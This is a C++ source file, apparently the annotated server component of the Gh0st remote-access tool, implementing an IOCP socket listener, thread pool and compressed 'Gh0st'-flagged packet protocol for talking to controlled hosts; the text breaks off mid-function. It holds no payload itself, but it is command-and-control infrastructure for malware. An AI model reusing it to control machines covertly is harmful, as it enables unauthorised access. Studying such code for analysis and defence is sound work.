// IOCPServer.cpp: implementation of the CIOCPServer class.
//
//
#include "stdafx.h"
#include "IOCPServer.h"
#include "../MainFrm.h"
#include "zlib/zlib.h"
#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif
// Change at your Own Peril
// 'G' 'h' '0' 's' 't' | PacketLen | UnZipLen
#define HDR_SIZE 13
#define FLAG_SIZE 5
#define HUERISTIC_VALUE 2
CRITICAL_SECTION CIOCPServer::m_cs;
//
// Construction/Destruction
//
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: C'tor initializes Winsock2 and miscelleanous events etc.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
CIOCPServer::CIOCPServer()
{
TRACE("CIOCPServer=%p\n",this);
//
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);//初始化套接字库,版本为2.2
InitializeCriticalSection(&m_cs);//初始化临界资源
m_hThread = NULL;//监听线程句柄
m_hKillEvent = CreateEvent(NULL, TRUE, FALSE, NULL);//创建一个人工授信的事件句柄,其结束监听线程的作用
m_socListen = NULL;//监听套接字
m_bTimeToKill = false;//是否结束掉完成端口上所有的线程
m_bDisconnectAll = false;//关闭所有连接的一个哨兵
m_hEvent = NULL;//事件句柄
m_hCompletionPort= NULL;//完成端口句柄
m_bInit = false;//记录完成端口初始化是否成功
m_nCurrentThreads = 0;//为完成端口服务的工作者线程数量
m_nBusyThreads = 0;//为完成端口服务线程中当前处于工作的数量
m_nSendKbps = 0;//发送数据量
m_nRecvKbps = 0;//接受数据量
m_nMaxConnections = 10000;//最大连接数量
m_nKeepLiveTime = 1000 * 60 * 3; // 三分钟探测一次,保活机制的探测时间
// Packet Flag;
BYTE bPacketFlag[] = {'G', 'h', '0', 's', 't'}; //这里是数据发送的标记 服务端同客户端字符必须一致
memcpy(m_bPacketFlag, bPacketFlag, sizeof(bPacketFlag));//复制标示到变量中去
}
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: Tidy up
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
///析构函数中关闭完成端口,卸载套接字库的使用,跟进shutdown函数/
CIOCPServer::~CIOCPServer()
{
try
{
Shutdown();
WSACleanup();
}catch(...){}
}
//
// FUNCTION: Init
//
// DESCRIPTION: Starts listener into motion
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
bool CIOCPServer::Initialize(NOTIFYPROC pNotifyProc, CMainFrame* pFrame, int nMaxConnections, int nPort)
{
m_pNotifyProc = pNotifyProc;//这是将回调函数保存到自己内部变量
m_pFrame = pFrame;//保存框架指针
m_nMaxConnections = nMaxConnections;//保存最大连接数
m_socListen = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED);//新建套接字
if (m_socListen == INVALID_SOCKET)//创建失败
{
TRACE(_T("Could not create listen socket %ld\n"),WSAGetLastError());
return false;
}
// Event for handling Network IO
m_hEvent = WSACreateEvent();//创建网络事件句柄
if (m_hEvent == WSA_INVALID_EVENT)//创建事件失败
{
TRACE(_T("WSACreateEvent() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
// The listener is ONLY interested in FD_ACCEPT
// That is when a client connects to or IP/Port
// Request async notification
//将一个事件对象与网络事件集合关联在一起,感兴趣的事件FD_ACCEPT,发生生网络事件时m_hEvent变为授信状态
int nRet = WSAEventSelect(m_socListen,
m_hEvent,
FD_ACCEPT);
if (nRet == SOCKET_ERROR)//关联失败
{
TRACE(_T("WSAAsyncSelect() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
SOCKADDR_IN saServer; //创建一个SOCKADDR_IN结构的对象
// Listen on our designated Port#
saServer.sin_port = htons(nPort);//赋值
// Fill in the rest of the address structure
saServer.sin_family = AF_INET;
saServer.sin_addr.s_addr = INADDR_ANY;
// bind our name to the socket
//绑定套接字
nRet = bind(m_socListen,
(LPSOCKADDR)&saServer,
sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR)//套接字绑定失败
{
TRACE(_T("bind() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
// Set the socket to listen
nRet = listen(m_socListen, SOMAXCONN);//开始监听
if (nRet == SOCKET_ERROR)//监听失败
{
TRACE(_T("listen() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
UINT dwThreadId = 0;
//开启监听线程 跟进ListenThreadProc
//并初始化完成端口
m_hThread =
(HANDLE)_beginthreadex(NULL, // Security
0, // Stack size - use default
ListenThreadProc, // Thread fn entry point
(void*) this,
0, // Init flag
&dwThreadId); // Thread address
if (m_hThread != INVALID_HANDLE_VALUE)//线程创建成功
{
InitializeIOCP();//初始化完成端口
m_bInit = true;//设置m_bInit变量为true
return true;
}
return false;
}
//
// FUNCTION: CIOCPServer::ListenThreadProc
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
unsigned CIOCPServer::ListenThreadProc(LPVOID lParam) //监听线程
{
CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(lParam);//保存CIOCPServer指针
WSANETWORKEVENTS events;//创建WSANETWORKEVENTS结构events对象
while(1)
{
//
// Wait for something to happen
//等待m_hKillEvent事件100毫秒,如果m_hKillEvent有信号就跳出循环
if (WaitForSingleObject(pThis->m_hKillEvent, 100) == WAIT_OBJECT_0)
break;
DWORD dwRet;
//等待FD_ACCPETs网络事件通知,等待100毫秒
dwRet = WSAWaitForMultipleEvents(1,
&pThis->m_hEvent,
FALSE,
100,
FALSE);
if (dwRet == WSA_WAIT_TIMEOUT)//等待超时
continue;
//
// Figure out what happened
//检测m_socListen套接口上网络事件的发生。
int nRet = WSAEnumNetworkEvents(pThis->m_socListen,
pThis->m_hEvent,
&events);
if (nRet == SOCKET_ERROR)//失败
{
TRACE(_T("WSAEnumNetworkEvents error %ld\n"),WSAGetLastError());
break;
}
// Handle Network events //
// ACCEPT
// 判断网络事件是不是FD_ACCEPT
if (events.lNetworkEvents & FD_ACCEPT)
{
if (events.iErrorCode[FD_ACCEPT_BIT] == 0)//获取看是否有错误无错误调用OnAccept函数
pThis->OnAccept();
else
{
TRACE(_T("Unknown network event error %ld\n"),WSAGetLastError());//有错误
break;
}
}
} // while....
return 0; // Normal Thread Exit Code...
}
//
// FUNCTION: CIOCPServer::OnAccept
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09072001 Changes for OVERLAPPEDPLUS
void CIOCPServer::OnAccept()
{
SOCKADDR_IN SockAddr;//定义SOCKADDR_IN结构对象
SOCKET clientSocket;//定义一个clientSocket套接字
int nRet;
int nLen;
if (m_bTimeToKill || m_bDisconnectAll)//如果要结束掉完成端口上所有的线程或者断开所有连接时,此函数退出
return;
//
// accept the new socket descriptor
//检测到有主机连接时调用accept并建立与之通信的套接字
nLen = sizeof(SOCKADDR_IN);
clientSocket = accept(m_socListen,
(LPSOCKADDR)&SockAddr,
&nLen);
if (clientSocket == SOCKET_ERROR)//接收失败
{
nRet = WSAGetLastError();//获取错误代码
if (nRet != WSAEWOULDBLOCK)//不等于WSAEWOULDBLOCK真的发生错误
{
//
// Just log the error and return
//
TRACE(_T("accept() error\n"),WSAGetLastError());
return;
}
}
// Create the Client context to be associted with the completion port
//定义一个指向ClientContext结构的指针,并调用函数进行赋值,我们跟进此函数!
ClientContext* pContext = AllocateContext();
// AllocateContext fail
if (pContext == NULL)//创建失败
return;
//将连接的套接字保存在上下文中
pContext->m_Socket = clientSocket;
// Fix up In Buffer
//对结构中接收的缓冲区赋值大小为8192
pContext->m_wsaInBuffer.buf = (char*)pContext->m_byInBuffer;
pContext->m_wsaInBuffer.len = sizeof(pContext->m_byInBuffer);
// Associate the new socket with a completion port.
//判断完成端口是否绑定成功
if (!AssociateSocketWithCompletionPort(clientSocket, m_hCompletionPort, (DWORD) pContext))//关联失败
{
//失败时删除这个指针并置为空,关闭连接用的套接字。关闭监听套接字,并返回
delete pContext;
pContext = NULL;
closesocket( clientSocket );
closesocket( m_socListen );
return;
}
// 关闭nagle算法,以免影响性能,因为控制时控制端要发送很多数据量很小的数据包,要求马上发送
// 暂不关闭,实验得知能网络整体性能有很大影响
const char chOpt = 1;
// int nErr = setsockopt(pContext->m_Socket, IPPROTO_TCP, TCP_NODELAY, &chOpt, sizeof(char));
// if (nErr == -1)
// {
// TRACE(_T("setsockopt() error\n"),WSAGetLastError());
// return;
// }
// Set KeepAlive 开启保活机制
//对于 socket 非正常断开
//设置套接字的属性,并赋予它保活机制,如果设置错误获取错误代码
if (setsockopt(pContext->m_Socket, SOL_SOCKET, SO_KEEPALIVE, (char *)&chOpt, sizeof(chOpt)) != 0)//发生错误
{
TRACE(_T("setsockopt() error\n"), WSAGetLastError());
}
// 设置超时详细信息
tcp_keepalive klive;
klive.onoff = 1; // 启用保活
klive.keepalivetime = m_nKeepLiveTime; // 开始首次 KeepAlive 探测前的 TCP 空闭时间 3分钟一次
klive.keepaliveinterval = 1000 * 10; // 重试间隔为10秒 Resend if No-Reply
WSAIoctl
(
pContext->m_Socket,
SIO_KEEPALIVE_VALS,
&klive,
sizeof(tcp_keepalive),
NULL,
0,
(unsigned long *)&chOpt,
0,
NULL
);
CLock cs(m_cs, "OnAccept" );;//加入链表之前要进行共享资源访问的控制在此调用CLock类
// Hold a reference to the context
m_listContexts.AddTail(pContext);//把上下文加入上下文列表,每有一个连接就建立一个上下文并加入列表
// Trigger first IO Completion Request
// Otherwise the Worker thread will remain blocked waiting for GetQueuedCompletionStatus...
// The first message that gets queued up is ClientIoInitializing - see ThreadPoolFunc and
// IO_MESSAGE_HANDLER
//动态新建一个OVERLAPPEDPLUS结构并初始化IOType类型为IOInitialize
OVERLAPPEDPLUS *pOverlap = new OVERLAPPEDPLUS(IOInitialize);
//向一个已经初始完的I/O端口发送数据包操作类型为IOInitialize,触发GetQueuedCompletionStatus功能调用函数来取得数据包
BOOL bSuccess = PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
if ( (!bSuccess && GetLastError( ) != ERROR_IO_PENDING))//发送失败
{
RemoveStaleClient(pContext,TRUE);
return;
}
//我们看一下NC_CLIENT_CONNECT实现了什么都没做
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_CONNECT);//调用回调函数发送NC_CLINET_CONECT这个参数,跟踪得知什么都没做
// Post to WSARecv Next
PostRecv(pContext);//抛出接受的请求,跟进函数
}
//
// FUNCTION: CIOCPServer::InitializeIOCP
//
// DESCRIPTION: Create a dummy socket and associate a completion port with it.
// once completion port is create we can dicard the socket
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
bool CIOCPServer::InitializeIOCP(void)
{
//新建完成端口开始函数,准备相关参数
SOCKET s;
DWORD i;
UINT nThreadID;
SYSTEM_INFO systemInfo;
//
// First open a temporary socket that we will use to create the
// completion port. In NT 3.51 it will not be necessary to specify
// the FileHandle parameter of CreateIoCompletionPort()--it will
// be legal to specify FileHandle as NULL. However, for NT 3.5
// we need an overlapped file handle.
//
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);//新建一个SOKET
if ( s == INVALID_SOCKET )
return false;
// Create the completion port that will be used by all the worker
// threads.创建完成端口新建一个完成端口,
//这里只是新建一个完成端口可用另外一个方法:HANDLE CompletionPort = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
m_hCompletionPort = CreateIoCompletionPort( (HANDLE)s, NULL, 0, 0 );
if ( m_hCompletionPort == NULL ) //创建失败,关闭SOKET
{
closesocket( s );
return false;
}
// Close the socket, we don't need it any longer.
closesocket( s );
// Determine how many processors are on the system获取CPU数量.
GetSystemInfo( &systemInfo );//获得系统信息
m_nThreadPoolMin = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;//进行相关线程的赋值,后续在根据CPU使用率调整时会用到
m_nThreadPoolMax = m_nThreadPoolMin;
m_nCPULoThreshold = 10; //设置CPU最大允许利用率和最小允许利用率
m_nCPUHiThreshold = 75;
m_cpu.Init();//初始化CPU的使用率
// We use two worker threads for eachprocessor on the system--this is choosen as a good balance
// that ensures that there are a sufficient number of threads available to get useful work done
// but not too many that context switches consume significant overhead.
//建立2倍CPU数量的工作者线程
UINT nWorkerCnt = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;
// We need to save the Handles for Later Termination...
HANDLE hWorker;//定义工作线程句柄
m_nWorkerCnt = 0;
//建立工作者线程,线程函数为ThreadPoolfunc
for ( i = 0; i < nWorkerCnt; i++ )
{
hWorker = (HANDLE)_beginthreadex(NULL, // Security
0, // Stack size - use default
ThreadPoolFunc, // Thread fn entry point
(void*) this, // Param for thread
0, // Init flag
&nThreadID); // Thread address
if (hWorker == NULL ) //创建失败
{
CloseHandle( m_hCompletionPort );//关闭完成端口
return false;
}
m_nWorkerCnt++;//加1用于统计创建的工作者线程
CloseHandle(hWorker);//关闭句柄减少引用技术
}
return true;
}
//
// FUNCTION: CIOCPServer::ThreadPoolFunc
//
// DESCRIPTION: This is the main worker routine for the worker threads.
// Worker threads wait on a completion port for I/O to complete.
// When it completes, the worker thread processes the I/O, then either pends
// new I/O or closes the client's connection. When the service shuts
// down, other code closes the completion port which causes
// GetQueuedCompletionStatus() to wake up and the worker thread then
// exits.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
unsigned CIOCPServer::ThreadPoolFunc (LPVOID thisContext) //工作者线程函数起始位置
{
// Get back our pointer to the class
ULONG ulFlags = MSG_PARTIAL;
CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(thisContext);//保存CIOCPServer指针到内部变量
ASSERT(pThis);
HANDLE hCompletionPort = pThis->m_hCompletionPort;//完成端口句柄赋予内部变量
DWORD dwIoSize;
LPOVERLAPPED lpOverlapped;//定义一个OVERLAPPEDPLUS结构的lpOverlapped指针
ClientContext* lpClientContext;//定义一个ClientContext的lpClientContext指针
OVERLAPPEDPLUS* pOverlapPlus;//定义一个OVERLAPPEDPLUS扩展后的pOverlapPlus指针
bool bError;
bool bEnterRead;
InterlockedIncrement(&pThis->m_nCurrentThreads);//主要用于线程同步
InterlockedIncrement(&pThis->m_nBusyThreads);
//
// Loop round and round servicing I/O completions.
// 不停地循环来处理IO
//只有在bstayinpool为flase或者m_btimetokill为true时跳出循环
for (BOOL bStayInPool = TRUE; bStayInPool && pThis->m_bTimeToKill == false; )
{
pOverlapPlus = NULL;
lpClientContext = NULL;
bError = false;
bEnterRead = false;
// Thread is Block waiting for IO completion
InterlockedDecrement(&pThis->m_nBusyThreads);//锁住
// Get a completed IO request.获取IO完成状态
BOOL bIORet = GetQueuedCompletionStatus(
hCompletionPort,
&dwIoSize,
(LPDWORD) &lpClientContext,
&lpOverlapped, INFINITE);
DWORD dwIOError = GetLastError();//获取错误代码
//指针的范围进行一个扩大,指向整个的定义结构,这样就能指向带有附加数据的整个OVERLAPPEDPLUS类型,并且根据附加的数据的m_ioType域的不同,进行不同的处理
pOverlapPlus = CONTAINING_RECORD(lpOverlapped, OVERLAPPEDPLUS, m_ol);
int nBusyThreads = InterlockedIncrement(&pThis->m_nBusyThreads);
if (!bIORet && dwIOError != WAIT_TIMEOUT )//获取状态错误或者错误代码不为WAIT_TIMEOUT时
{
if (lpClientContext && pThis->m_bTimeToKill == false)//当IPCLINETCONTEXT不为空,且M_btinetokill等于flase时进行移除链表
{
pThis->RemoveStaleClient(lpClientContext, FALSE);
}
continue;
// anyway, this was an error and we should exit有错误退出
bError = true;
}
if (!bError) // 没错误处理
{
// Allocate another thread to the thread Pool?
//这里应该就是传说中的根据CPU状态智能调整
if (nBusyThreads == pThis->m_nCurrentThreads)//如果当前工作的线程等于为完成端口服务的线程
{
if (nBusyThreads < pThis->m_nThreadPoolMax)//工作的线程小于最大的工作线程时
{
if (pThis->m_cpu.GetUsage() > pThis->m_nCPUHiThreshold)//CPU使用率大于最大允许率的时候
{
UINT nThreadID = -1;
//新建一个线程
// HANDLE hThread = (HANDLE)_beginthreadex(NULL, // Security
// 0, // Stack size - use default
// ThreadPoolFunc, // Thread fn entry point
/// (void*) pThis,
// 0, // Init flag
// &nThreadID); // Thread address
// CloseHandle(hThread);
}
}
}
// Thread timed out - IDLE?
if (!bIORet && dwIOError == WAIT_TIMEOUT)//获取状态错误或者错误代码为WAIT_TIMEOUT时
{
if (lpClientContext == NULL)//如果为空,判定是否为发来的结束线程的数据包
{
if (pThis->m_cpu.GetUsage() < pThis->m_nCPULoThreshold)//如果CPU使用率小于允许的最小使用率时
{
// Thread has no outstanding IO - Server hasn't much to do so die
if (pThis->m_nCurrentThreads > pThis->m_nThreadPoolMin)//完成端口服务的线程大于最小工作线程时
bStayInPool = FALSE;
}
bError = true;
}
}
}
//
//
if (!bError)//这里就是主要功能判断没出错参数什么都不为NULL
{
if(bIORet && NULL != pOverlapPlus && NULL != lpClientContext)
{
try
{
pThis->ProcessIOMessage(pOverlapPlus->m_ioType, lpClientContext, dwIoSize);//根据IO完成类型调用不同的函数处理
}
catch (...) {}
}
}
//不为空时进行删除
if(pOverlapPlus)
delete pOverlapPlus; // from previous call
}
InterlockedDecrement(&pThis->m_nWorkerCnt);
InterlockedDecrement(&pThis->m_nCurrentThreads);
InterlockedDecrement(&pThis->m_nBusyThreads);
return 0;
}
//
// FUNCTION: CIOCPServer::Stop
//
// DESCRIPTION: Signal the listener to quit his thread
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::Stop()
{
::SetEvent(m_hKillEvent);
WaitForSingleObject(m_hThread, INFINITE);//一直等待m_hThread有信号
CloseHandle(m_hThread);
CloseHandle(m_hKillEvent);
}
//
// FUNCTION: CIOCPServer::GetHostName
//
// DESCRIPTION: Get the host name of the connect client
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
/获得相关连接的ip///
CString CIOCPServer::GetHostName(SOCKET socket)
{
sockaddr_in sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
int nSockAddrLen = sizeof(sockAddr);
BOOL bResult = getpeername(socket,(SOCKADDR*)&sockAddr, &nSockAddrLen);
return bResult != INVALID_SOCKET ? inet_ntoa(sockAddr.sin_addr) : "";
}
void CIOCPServer::PostRecv(ClientContext* pContext)
{
// issue a read request
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IORead);//定义相关变量
ULONG ulFlags = MSG_PARTIAL;
DWORD dwNumberOfBytesRecvd;
UINT nRetVal = WSARecv(pContext->m_Socket, //接受数据请求
&pContext->m_wsaInBuffer,
1,
&dwNumberOfBytesRecvd,
&ulFlags,
&pOverlap->m_ol,
NULL);
//如果发生错误,移除这个结构,注意第二个参数,此参数需终止此套接字上的连接
if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING)
{
RemoveStaleClient(pContext, FALSE);
}
}
//
// FUNCTION: CIOCPServer::Send
//
// DESCRIPTION: Posts a Write + Data to IO CompletionPort for transfer
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///首先,待发送的数据是在参数:lpData中,而待发送的数据的大小由参数:nSize指定。/
void CIOCPServer::Send(ClientContext* pContext, LPBYTE lpData, UINT nSize)
{
if (pContext == NULL)//如果是错误的调用直接返回
return;
try
{
if (nSize > 0)
{
// Compress data
//将数据进行压缩处理。 这个地方要注意:在压缩前,
//这个值的计算公式为: unsigned long destLen = (double)nSize * 1.001 + 12;这个是固定的。因为,内存中压缩数据的时候是需要一定大小的工作空间的,因此按照这个公式计算出工作需要的空间大小,然后申请这么大小的一个内存空间作为压缩过的数据的存储空间。
unsigned long destLen = (double)nSize * 1.001 + 12;
LPBYTE pDest = new BYTE[destLen];
int nRet = compress(pDest, &destLen, lpData, nSize);//使用compress进行压缩处理:int nRet = compress(pDest, &destLen, lpData, nSize);注意这个函数执行完成之后,在参数destLen中会返回数据被压缩过之后的一个大小。
if (nRet != Z_OK)//成功与否
{
delete [] pDest;
return;
}
//
/*开始往发送缓冲区中组织欲发送的数据
LONG nBufLen = destLen + HDR_SIZE(值为13); m_WriteBuffer.Write(m_bPacketFlag, sizeof
m_bPacketFlag));
m_WriteBuffer.Write((PBYTE) &nBufLen, sizeof(nBufLen));
m_WriteBuffer.Write((PBYTE) &nSize, sizeof(nSize));
m_WriteBuffer.Write(pDest, destLen);
数据包发送标记大小+整个数据包的大小+未压缩前数据包的大小+被压缩后的数据 */
LONG nBufLen = destLen + HDR_SIZE;
// 5 bytes packet flag
pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
// 4 byte header [Size of Entire Packet]
pContext->m_WriteBuffer.Write((PBYTE) &nBufLen, sizeof(nBufLen));
// 4 byte header [Size of UnCompress Entire Packet]
pContext->m_WriteBuffer.Write((PBYTE) &nSize, sizeof(nSize));
// Write Data
pContext->m_WriteBuffer.Write(pDest, destLen);
delete [] pDest;
// 发送完后,再备份数据, 因为有可能是m_ResendWriteBuffer本身在发送,所以不直接写入
//备份要发送的数据到m_ResendWriteBuffer缓冲区中
LPBYTE lpResendWriteBuffer = new BYTE[nSize];
CopyMemory(lpResendWriteBuffer, lpData, nSize);
pContext->m_ResendWriteBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.Write(lpResendWriteBuffer, nSize); // 备份发送的数据
delete [] lpResendWriteBuffer;
}
else // 要求重发
{ /*如果主控端在接收数据的时候出现了异常,这个时候主控端需要让被控端重新发送数据,则仅仅是向被控端准备发送标志数据包,如此,被控端会重新向客户端发送备份的数据*/
pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
pContext->m_ResendWriteBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag)); // 备份发送的数据
}
// Wait for Data Ready signal to become available
// 等待上次发送结束
WaitForSingleObject(pContext->m_hWriteComplete, INFINITE);
// Prepare Packet
// pContext->m_wsaOutBuffer.buf = (CHAR*) new BYTE[nSize];
// pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
/*用PostQueuedCompletionStatus投递一个类型为IOWrite类型的发送请求,
注意此函数的第二个参数为0。这个请求会由函数OnClientWriting去完成*/
PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
pContext->m_nMsgOut++;
}catch(...){}
}
//
// FUNCTION: CClientListener::OnClientInitializing
//
// DESCRIPTION: Called when client is initailizing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///从此函数可以看出初始化连接的时候什么都没做直接返回true/
bool CIOCPServer::OnClientInitializing(ClientContext* pContext, DWORD dwIoSize)
{
// We are not actually doing anything here, but we could for instance make
// a call to Send() to send a greeting message or something
return true; // make sure to issue a read after this
}
//
// FUNCTION: CIOCPServer::OnClientReading
//
// DESCRIPTION: Called when client is reading
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
bool CIOCPServer::OnClientReading(ClientContext* pContext, DWORD dwIoSize)//接受数据函数入口点
{
CLock cs(CIOCPServer::m_cs, "OnClientReading");//线程同步
try
{
//
static DWORD nLastTick = GetTickCount();//申明相应变量并赋值,Gertickcount返回操作系统从启动到现在的毫秒数
static DWORD nBytes = 0;
nBytes += dwIoSize;
/*静态局部变量的生存周期不会因为该函数被执行完而结束,它在全局内存存储。
因此,上述反应传输速度的代码应该这么理解,当第一次调用OnClientReadling函数的时候
,static DWORD nLastTick = GetTickCount();static DWORD nBytes = 0;这两句会被执行,
接下来通过判断采样时间是否超过一秒钟,第一次调用的时候肯定不会超过一秒钟,
但是当第二次调用该函数的时候,那两句定义静态变量的语句不会被执行,
这个时候nBytes的值会是上次传输的大小+本次传输的大小,
并且nLastTick的值还是上次采样的时间,由于本次采样的时间也许会超过了一秒钟,
因此,反映接收速度的参数m_nRecvKbps会被重新改写值,
并且这个时候,nBytes与nLastTick的值会被重新改写*/
if (GetTickCount() - nLastTick >= 1000)
{
nLastTick = GetTickCount();
InterlockedExchange((LPLONG)&(m_nRecvKbps), nBytes);
nBytes = 0;
}
//
/* 如果本次接收的数据大小为0的话,说明在数据传输的过程中遇到了不可预知的错误,
这个时候就将这个客户端删除掉去它的连接,让它在重新连接上来*/
if (dwIoSize == 0)
{
RemoveStaleClient(pContext, FALSE);
return false;
}
/*这个if语句发生的条件是如果被控端在接收主控端发送过去的数据的时候出现了错误,
它会要求主控端重新发送数据,而这种要求重发数据的操作正是通过被控端向主控端仅仅发送传输标志。
如果收到的是这样的数据包,则主控端会将备份区的数据重新发送到被控端。*/
if (dwIoSize == FLAG_SIZE && memcmp(pContext->m_byInBuffer, m_bPacketFlag, FLAG_SIZE) == 0)
{
// 重新发送
Send(pContext, pContext->m_ResendWriteBuffer.GetBuffer(), pContext->m_ResendWriteBuffer.GetBufferLen());
// 必须再投递一个接收请求
PostRecv(pContext);
return true;
}
// Add the message to out message
// Dont forget there could be a partial, 1, 1 or more + partial mesages
pContext->m_CompressionBuffer.Write(pContext->m_byInBuffer,dwIoSize);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE);//回调函数
// Check real Data
while (pContext->m_CompressionBuffer.GetBufferLen() > HDR_SIZE)//数据包长度是否大于13
{
//读出包中的标志与大小,验证接收的包是否合法
BYTE bPacketFlag[FLAG_SIZE];
CopyMemory(bPacketFlag, pContext->m_CompressionBuffer.GetBuffer(), sizeof(bPacketFlag));
if (memcmp(m_bPacketFlag, bPacketFlag, sizeof(m_bPacketFlag)) != 0)
throw "bad buffer";
/*取出包中的标志、整个包的大小、未压缩数据的大小。
读取出压缩数据,并进行解压处理。将解压后的数据存储到解压缓冲区中*/
int nSize = 0;
CopyMemory(&nSize, pContext->m_CompressionBuffer.GetBuffer(FLAG_SIZE), sizeof(int));
// Update Process Variable
pContext->m_nTransferProgress = pContext->m_CompressionBuffer.GetBufferLen() * 100 / nSize;
if (nSize && (pContext->m_CompressionBuffer.GetBufferLen()) >= nSize)
{
int nUnCompressLength = 0;
// Read off header
pContext->m_CompressionBuffer.Read((PBYTE) bPacketFlag, sizeof(bPacketFlag));
pContext->m_CompressionBuffer.Read((PBYTE) &nSize, sizeof(int));
pContext->m_CompressionBuffer.Read((PBYTE) &nUnCompressLength, sizeof(int));
//取出包中的标志、整个包的大小、未压缩数据的大小。读取出压缩数据,并进行解压处理。将解压后的数据存储到解压缓冲区中。
//如果上述过程有任意差池则调用Send(pContext, NULL, 0);要求受控端从新发送数据。//
// SO you would process your data here
// I'm just going to post message so we can see the data
int nCompressLength = nSize - HDR_SIZE;
PBYTE pData = new BYTE[nCompressLength];
PBYTE pDeCompressionData = new BYTE[nUnCompressLength];
if (pData == NULL || pDeCompressionData == NULL)
throw "bad Allocate";
pContext->m_CompressionBuffer.Read(pData, nCompressLength);
//
unsigned long destLen = nUnCompressLength;
int nRet = uncompress(pDeCompressionData, &destLen, pData, nCompressLength);
//
if (nRet == Z_OK)
{
pContext->m_DeCompressionBuffer.ClearBuffer();
pContext->m_DeCompressionBuffer.Write(pDeCompressionData, destLen);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE_COMPLETE);
}
else
{
throw "bad buffer";
}
delete [] pData;
delete [] pDeCompressionData;
pContext->m_nMsgIn++;
}
else
break;
}
// Post to WSARecv Next
PostRecv(pContext);
}catch(...)
{ //述过程有任意差池则调用Send(pContext, NULL, 0);要求受控端从新发送数据
pContext->m_CompressionBuffer.ClearBuffer();
// 要求重发,就发送0, 内核自动添加数包标志
Send(pContext, NULL, 0);
PostRecv(pContext);
}
return true;
}
//
// FUNCTION: CIOCPServer::OnClientWriting
//
// DESCRIPTION: Called when client is writing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
bool CIOCPServer::OnClientWriting(ClientContext* pContext, DWORD dwIoSize)
{
try
{
/*首先,跟接收数据一样,先更新一下代表发送速度的变量值:m_nSendKbps,
这个更新的过程,跟接收的时候的一样,在这里只要注意一点局部静态变量的使用方法就好了,不再赘述。*/
//
static DWORD nLastTick = GetTickCount();
static DWORD nBytes = 0;
nBytes += dwIoSize;
if (GetTickCount() - nLastTick >= 1000)
{
nLastTick = GetTickCount();
InterlockedExchange((LPLONG)&(m_nSendKbps), nBytes);
nBytes = 0;
}
//
